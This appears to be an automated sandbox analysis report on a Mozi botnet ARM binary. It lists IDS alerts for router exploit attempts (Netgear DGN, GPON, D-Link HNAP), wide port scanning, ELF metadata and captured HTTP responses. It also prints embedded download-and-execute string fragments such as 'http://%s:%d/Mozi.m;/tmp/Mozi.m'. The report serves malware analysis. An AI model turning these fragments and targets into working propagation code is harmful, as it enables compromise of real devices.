Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:46538 -> 192.126.238.185:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:46538 -> 192.126.238.185:80
Source: Traffic	Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41830 -> 174.136.32.221:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41830 -> 174.136.32.221:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41830 -> 174.136.32.221:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:51146 -> 95.171.44.71:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:51146 -> 95.171.44.71:80
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:60330 -> 37.28.170.140:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:60330 -> 37.28.170.140:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:55812 -> 93.41.229.147:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:54054 -> 23.57.42.173:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:55982 -> 23.1.122.127:80

Source: global traffic	TCP traffic: 49.30.95.191 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 46.208.194.138 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 186.13.189.220 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 115.128.48.99 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 87.59.59.83 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 40.217.232.105 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 1.102.177.191 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 145.78.150.14 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 182.70.170.130 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 194.204.98.109 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 147.242.54.19 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 92.66.154.32 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 165.213.73.162 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 60.91.131.86 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 97.132.168.27 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 81.78.52.168 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 152.225.18.120 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 183.56.193.84 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 170.248.33.117 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 119.44.231.19 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 34.235.160.60 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 112.176.104.27 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 27.49.23.52 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 105.242.110.44 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 93.51.81.184 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 119.236.192.141 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 166.236.5.250 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 120.234.0.119 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 145.20.161.88 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 45.60.67.75 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 182.6.67.113 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 120.184.29.196 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 83.120.45.138 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 71.10.2.3 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 186.74.80.35 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 6.42.96.227 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 131.239.170.174 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 130.30.19.29 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 124.242.109.222 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 60.39.118.49 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 154.227.186.158 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 41.1.30.61 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 122.36.114.106 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 150.179.62.203 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 33.162.5.64 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 79.115.136.43 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 221.126.105.14 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 188.90.174.120 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 219.17.67.235 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 34.69.23.176 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 8.96.114.127 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 118.24.78.63 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 105.188.53.103 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 88.103.118.246 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 8.33.31.17 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 189.232.159.133 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 83.41.162.42 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 79.161.24.176 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 143.54.177.24 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 4.178.77.136 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 154.2.250.169 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 197.43.185.122 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 168.21.138.88 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 156.225.166.184 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 1.224.209.95 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 30.101.205.242 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 119.163.0.210 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 83.199.233.176 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 159.42.57.237 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 60.138.201.97 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 120.185.75.38 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 211.183.25.135 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 133.193.211.115 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 210.162.131.189 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 33.38.63.31 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 179.28.189.224 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 198.195.107.231 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 103.133.112.54 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 29.146.1.94 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 216.93.120.15 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 58.170.123.16 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 17.229.113.84 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 9.219.58.246 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 67.56.126.36 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 11.216.21.192 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 13.156.98.231 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 152.79.242.212 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 175.195.226.130 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 54.122.133.187 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 197.34.33.4 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 138.81.221.137 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 81.79.57.93 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 152.90.219.150 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 13.59.26.118 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 133.165.216.47 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 130.102.160.74 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 104.86.216.214 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 166.31.23.109 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 179.220.108.237 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 122.120.11.163 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 25.87.237.51 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 5.30.108.246 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 47.57.146.158 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 55.226.166.165 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 39.152.6.71 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 139.235.155.108 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 141.147.122.73 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 137.242.74.67 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 154.192.176.198 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 54.1.124.25 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 219.44.149.12 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 169.240.44.151 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 166.92.12.100 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 128.218.150.32 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 123.55.16.248 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 25.224.91.27 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 200.115.122.89 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 24.1.57.126 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 11.174.186.112 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 90.198.227.113 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 21.235.94.156 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 17.202.225.253 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 65.53.76.53 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 122.42.97.57 ports 1,2,4,5,9,49152

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 45.134.0.236
Source: unknown	TCP traffic detected without corresponding DNS query: 113.200.105.232
Source: unknown	TCP traffic detected without corresponding DNS query: 67.129.160.73
Source: unknown	TCP traffic detected without corresponding DNS query: 184.11.167.170
Source: unknown	TCP traffic detected without corresponding DNS query: 109.102.232.127
Source: unknown	TCP traffic detected without corresponding DNS query: 105.61.103.103
Source: unknown	TCP traffic detected without corresponding DNS query: 166.31.23.109
Source: unknown	TCP traffic detected without corresponding DNS query: 35.45.112.6
Source: unknown	TCP traffic detected without corresponding DNS query: 22.144.232.185
Source: unknown	TCP traffic detected without corresponding DNS query: 100.196.47.140
Source: unknown	TCP traffic detected without corresponding DNS query: 215.43.78.87
Source: unknown	TCP traffic detected without corresponding DNS query: 86.26.124.100
Source: unknown	TCP traffic detected without corresponding DNS query: 220.130.213.29
Source: unknown	TCP traffic detected without corresponding DNS query: 111.249.251.6
Source: unknown	TCP traffic detected without corresponding DNS query: 55.245.84.60
Source: unknown	TCP traffic detected without corresponding DNS query: 200.186.246.157
Source: unknown	TCP traffic detected without corresponding DNS query: 102.5.129.5
Source: unknown	TCP traffic detected without corresponding DNS query: 137.64.79.56
Source: unknown	TCP traffic detected without corresponding DNS query: 185.119.191.5
Source: unknown	TCP traffic detected without corresponding DNS query: 21.235.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 65.53.76.53
Source: unknown	TCP traffic detected without corresponding DNS query: 192.79.212.170
Source: unknown	TCP traffic detected without corresponding DNS query: 171.179.128.100
Source: unknown	TCP traffic detected without corresponding DNS query: 72.88.15.204
Source: unknown	TCP traffic detected without corresponding DNS query: 45.25.57.240
Source: unknown	TCP traffic detected without corresponding DNS query: 218.50.181.147
Source: unknown	TCP traffic detected without corresponding DNS query: 126.28.245.2
Source: unknown	TCP traffic detected without corresponding DNS query: 40.107.51.226
Source: unknown	TCP traffic detected without corresponding DNS query: 216.205.149.24
Source: unknown	TCP traffic detected without corresponding DNS query: 126.36.55.25
Source: unknown	TCP traffic detected without corresponding DNS query: 90.228.187.181
Source: unknown	TCP traffic detected without corresponding DNS query: 29.252.61.177
Source: unknown	TCP traffic detected without corresponding DNS query: 188.126.206.174
Source: unknown	TCP traffic detected without corresponding DNS query: 35.183.126.209
Source: unknown	TCP traffic detected without corresponding DNS query: 125.19.179.159
Source: unknown	TCP traffic detected without corresponding DNS query: 29.90.179.91
Source: unknown	TCP traffic detected without corresponding DNS query: 52.178.207.54
Source: unknown	TCP traffic detected without corresponding DNS query: 187.0.181.7
Source: unknown	TCP traffic detected without corresponding DNS query: 198.194.3.135
Source: unknown	TCP traffic detected without corresponding DNS query: 180.254.127.131
Source: unknown	TCP traffic detected without corresponding DNS query: 179.194.207.199
Source: unknown	TCP traffic detected without corresponding DNS query: 105.25.244.131
Source: unknown	TCP traffic detected without corresponding DNS query: 91.8.221.112
Source: unknown	TCP traffic detected without corresponding DNS query: 118.24.78.63
Source: unknown	TCP traffic detected without corresponding DNS query: 199.238.225.170
Source: unknown	TCP traffic detected without corresponding DNS query: 182.6.67.113
Source: unknown	TCP traffic detected without corresponding DNS query: 154.2.250.169
Source: unknown	TCP traffic detected without corresponding DNS query: 93.65.82.228

Source: networks.12.dr	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: Mozi.m.3, networks.12.dr	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: networks.12.dr	String found in binary or memory: http://%s:%d/Mozi.m
Source: Mozi.m.3, networks.12.dr	String found in binary or memory: http://%s:%d/Mozi.m;
Source: Mozi.m.3, networks.12.dr	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: Mozi.m.3, networks.12.dr	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: networks.12.dr	String found in binary or memory: http://%s:%d/bin.sh
Source: Mozi.m.3, networks.12.dr	String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: networks.12.dr	String found in binary or memory: http://127.0.0.1
Source: Mozi.m.3, networks.12.dr	String found in binary or memory: http://127.0.0.1sendcmd
Source: Mozi.m.3, networks.12.dr	String found in binary or memory: http://HTTP/1.1
Source: Mozi.m.3, networks.12.dr	String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: kmod.sh.12.dr	String found in binary or memory: http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
Source: .config.12.dr	String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: networks.12.dr	String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh.12.dr	String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh.12.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh.12.dr	String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: Mozi.m.3, networks.12.dr	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: networks.12.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: networks.12.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Mozi.m.3, networks.12.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh.12.dr	String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh.12.dr	String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh.12.dr	String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh.12.dr	String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh.12.dr	String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh.12.dr	String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh.12.dr	String found in binary or memory: http://www.pastebin.ca/upload.php

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8194
Flags:	0x4000002
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	5
Section Header Offset:	307280
Section Header Size:	40
Number of Section Headers:	17
Header String Table Index:	16

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0
.init	PROGBITS	0x80d4	0xd4	0x10	0x0	0x6	AX	0	4
.text	PROGBITS	0x80f0	0xf0	0x34a98	0x0	0x6	AX	0	16
.fini	PROGBITS	0x3cb88	0x34b88	0x10	0x0	0x6	AX	0	4
.rodata	PROGBITS	0x3cb98	0x34b98	0xb9d0	0x0	0x2	A	0	8
.ARM.extab	PROGBITS	0x48568	0x40568	0x18	0x0	0x2	A	0	4
.ARM.exidx	ARM_EXIDX	0x48580	0x40580	0x128	0x0	0x82	AL	2	4
.eh_frame	PROGBITS	0x51000	0x41000	0x4	0x0	0x3	WA	0	4
.tbss	NOBITS	0x51004	0x41004	0x8	0x0	0x403	WAT	0	4
.init_array	INIT_ARRAY	0x51004	0x41004	0x4	0x0	0x3	WA	0	4
.fini_array	FINI_ARRAY	0x51008	0x41008	0x4	0x0	0x3	WA	0	4
.data.rel.ro	PROGBITS	0x51010	0x41010	0x18	0x0	0x3	WA	0	4
.got	PROGBITS	0x51028	0x41028	0xb8	0x4	0x3	WA	0	4
.data	PROGBITS	0x510e0	0x410e0	0x9ec8	0x0	0x3	WA	0	8
.bss	NOBITS	0x5afa8	0x4afa8	0x25b90	0x0	0x3	WA	0	8
.ARM.attributes	ARM_ATTRIBUTES	0x0	0x4afa8	0x16	0x0	0x0		0	1
.shstrtab	STRTAB	0x0	0x4afbe	0x90	0x0	0x0		0	1

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
EXIDX	0x40580	0x48580	0x48580	0x128	0x128	2.1681	0x4	R	0x4	.ARM.exidx
LOAD	0x0	0x8000	0x8000	0x406a8	0x406a8	3.5095	0x5	R E	0x8000	.init .text .fini .rodata .ARM.extab .ARM.exidx
LOAD	0x41000	0x51000	0x51000	0x9fa8	0x2fb38	1.9454	0x6	RW	0x8000	.eh_frame .init_array .fini_array .data.rel.ro .got .data .bss
TLS	0x41004	0x51004	0x51004	0x0	0x8	0.0000	0x4	R	0x4
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 12:57:32 GMTServer: Apache/2.2.3 (Debian)Content-Length: 290Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 33 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p><hr><address>Apache/2.2.3 (Debian) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 109Date: Thu, 25 Jun 1970 01:00:08 GMTExpires: 0Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 404: Not Found</title></head><body><h1>Error 404: Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 12:58:23 GMTContent-Type: text/htmlContent-Length: 566Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 12:58:42 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 12:59:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTVary: Accept-EncodingServer: cloudflareCF-RAY: 6d4a657b6cc89137-FRAContent-Encoding: gzipData Raw: 35 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c5 57 5b 6f db 36 14 7e f7 af 38 d5 80 ee 25 b4 2c 27 71 5c 47 d6 50 a4 19 96 a7 05 5b 82 ad 28 0a 83 22 8f 2c 26 14 a9 92 f4 0d db fe fb 40 51 72 e5 38 cd da 87 62 7e 31 af 1f cf e5 3b 17 a5 af de fd 7a 75 f7 fe f6 1a 4a 57 c9 6c 90 be 22 e4 83 28 40 3a b8 b9 86 8b 8f 19 a4 7e 03 98 a4 d6 ce 23 a5 c9 83 05 81 13 d0 92 0b 8c 40 52 b5 9c 47 a8 c8 fd ef 51 06 e9 ab 0f a8 b8 28 3e 12 f2 19 aa c5 01 78 1e ea e2 db a0 a6 2f 40 4d bf 01 6a e9 5a 34 bf f0 9c 96 c7 28 84 1c 22 95 48 79 36 48 9d 70 12 b3 77 c2 20 73 70 73 0b 94 31 b4 16 94 76 40 a5 d4 1b e4 f0 37 5c 49 bd e2 85 a4 06 d3 38 5c 18 a4 15 3a 0a ac a4 c6 a2 9b 47 f7 77 3f 93 69 04 71 b7 51 3a 57 13 fc b4 12 eb 79 74 a5 95 43 e5 c8 dd ae c6 08 58 98 cd 23 87 5b 17 7b c1 2f f7 30 2f a1 fc 49 ee df 92 2b 5d d5 d4 89 5c f6 81 6e ae e7 d7 7c 89 27 ac 34 ba c2 79 d2 03 50 b4 c2 79 64 74 ae 9d ed dd 50 5a 28 8e db 13 50 ba d0 5e cb a3 2b 6b 81 9b 5a 1b d7 